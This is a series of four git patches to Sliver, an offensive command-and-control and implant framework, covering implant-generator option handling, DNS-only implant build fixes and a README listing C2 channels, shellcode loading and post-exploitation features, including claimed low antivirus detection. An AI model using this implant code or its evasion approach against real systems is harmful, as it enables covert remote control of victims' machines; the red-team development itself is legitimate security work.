From 2ce7823c3ffb24479913f3c91ea5d021d185c7e0 Mon Sep 17 00:00:00 2001 From: moloch Date: Thu, 14 Feb 2019 21:05:14 -0500 Subject: [PATCH 1/4] ux improvements --- client/command/sliver.go | 22 ++++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/client/command/sliver.go b/client/command/sliver.go index 5e5ec287e0..bbe69f92dd 100644 --- a/client/command/sliver.go +++ b/client/command/sliver.go @@ -194,8 +194,26 @@ func generate(ctx *grumble.Context, rpc RPCServer) { save := ctx.Flags.String("save") - if lhost == "" { - fmt.Printf(Warn+"Invalid lhost '%s'\n", lhost) + /* For UX we convert some synonymous terms */ + targetOS = strings.ToLower(targetOS) + if targetOS == "mac" || targetOS == "macos" || targetOS == "m" { + targetOS = "darwin" + } + if targetOS == "win" || targetOS == "w" || targetOS == "shit" { + targetOS = "windows" + } + if targetOS == "unix" || targetOS == "l" { + targetOS = "linux" + } + if arch == "x64" || strings.HasPrefix(arch, "64") { + arch = "amd64" + } + if arch == "x86" || strings.HasPrefix(arch, "32") { + arch = "386" + } + + if lhost == "" && dnsParent == "" { + fmt.Printf(Warn + "Must specify --lhost or --dns\n") return } if save == "" { From 438fa60503531113f299abf4dcc439dcc36cac25 Mon Sep 17 00:00:00 2001 From: moloch Date: Thu, 14 Feb 2019 22:44:32 -0500 Subject: [PATCH 2/4] ux improvements --- client/command/sliver.go | 8 +++----- server/console/console-players.go | 3 +-- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/client/command/sliver.go b/client/command/sliver.go index bbe69f92dd..74193c9847 100644 --- a/client/command/sliver.go +++ b/client/command/sliver.go @@ -180,8 +180,8 @@ func info(ctx *grumble.Context, rpc RPCServer) { } func generate(ctx *grumble.Context, rpc RPCServer) { - targetOS := ctx.Flags.String("os") - arch := ctx.Flags.String("arch") + targetOS := strings.ToLower(ctx.Flags.String("os")) + arch := strings.ToLower(ctx.Flags.String("arch")) lhost := ctx.Flags.String("lhost") lport := ctx.Flags.Int("lport") debug := ctx.Flags.Bool("debug") @@ -195,7 +195,6 @@ func generate(ctx *grumble.Context, rpc RPCServer) { save := ctx.Flags.String("save") /* For UX we convert some synonymous terms */ - targetOS = strings.ToLower(targetOS) if targetOS == "mac" || targetOS == "macos" || targetOS == "m" { targetOS = "darwin" } @@ -217,8 +216,7 @@ func generate(ctx *grumble.Context, rpc RPCServer) { return } if save == "" { - fmt.Printf(Warn + "Save path required (--save)\n") - return + save, _ = os.Getwd() } // Make sure we have the FQDN diff --git a/server/console/console-players.go b/server/console/console-players.go index 2886ccbd52..224c60be90 100644 --- a/server/console/console-players.go +++ b/server/console/console-players.go @@ -74,8 +74,7 @@ func newPlayerCmd(ctx *grumble.Context) { } if save == "" { - fmt.Printf(Warn + "Save file required (--save)\n") - return + save, _ = os.Getwd() } fmt.Printf(Info + "Generating new client certificate, please wait ... \n") From 09a627e8c13eb910b14c6a20e0c6384c78e3af41 Mon Sep 17 00:00:00 2001 From: moloch Date: Fri, 15 Feb 2019 10:52:23 -0500 Subject: [PATCH 3/4] fixed bugs in dns-only builds of implant --- sliver/sliver.go | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/sliver/sliver.go b/sliver/sliver.go index 8e3fc13fb0..1bf4cc3dc9 100644 --- a/sliver/sliver.go +++ b/sliver/sliver.go @@ -3,7 +3,10 @@ package main import ( "crypto/x509" "flag" + + // {{if .MTLSServer}} "io" + // {{end}} "os" "os/user" "runtime" @@ -71,13 +74,17 @@ func startConnectionLoop() { // {{end}} connectionAttempts := 0 for connectionAttempts < maxErrors { - err := mtlsConnect() + var err error + + // {{if .MTLSServer}} + err = mtlsConnect() if err != nil { // {{if .Debug}} log.Printf("[mtls] Connection failed %s", err) // {{end}} } connectionAttempts++ + // {{end}} // {{if .DNSParent}} if dnsParent != "" { From 80603d743271b5c18183af01133f0b6be606fb58 Mon Sep 17 00:00:00 2001 From: moloch Date: Sat, 16 Feb 2019 09:29:11 -0500 Subject: [PATCH 4/4] updated readme --- README.md | 33 +++++++++++++++++++++++---------- 1 file changed, 23 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index bb0b5a5134..8f9882d69e 100644 --- a/README.md +++ b/README.md @@ -5,21 +5,34 @@ Sliver Sliver is a remote shellcode loading and injection service that uses end-to-end encryption (mTLS) for all network traffic. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver can load arbitrary shellcode but also integrates with MSFVenom to automatically generate, execute, and manage Meterpreter payloads. Sliver binaries have very low anti-virus detection as they do not contain any malicous code themselves and instead dynamically load it over the network. -Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access. +Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access. -``` -[attacker] <-(mTLS)-> [sliver] -(code injection)-> [remote process] -``` +### Feature Progess -Sliver is designed to be secure-by-default and have as few dependancies as possible. +#### C2 +- [x] Mutual TLS +- [x] Encrypted DNS +- [ ] HTTP(S) +- [ ] ICMP -### Setup +#### Chain Loader +- [x] Raw Shellcode +- [x] .NET Assemblies +- [x] Metasploit/Meterpreter (v5 or later) +- [ ] Empire +- [ ] Cobalt Strike -1. Install Metasploit Framework v5 or later (if you want to use MSF features) -2. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary -3. ??? -4. Shellz +#### Post Exploitation +- [x] Windows Token Manipulation +- [x] Procdump +- [ ] TCP tunnels +- [ ] Reverse SOCKS proxy + +### Setup +1. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary +2. ??? +3. Shellz ## Compile From Source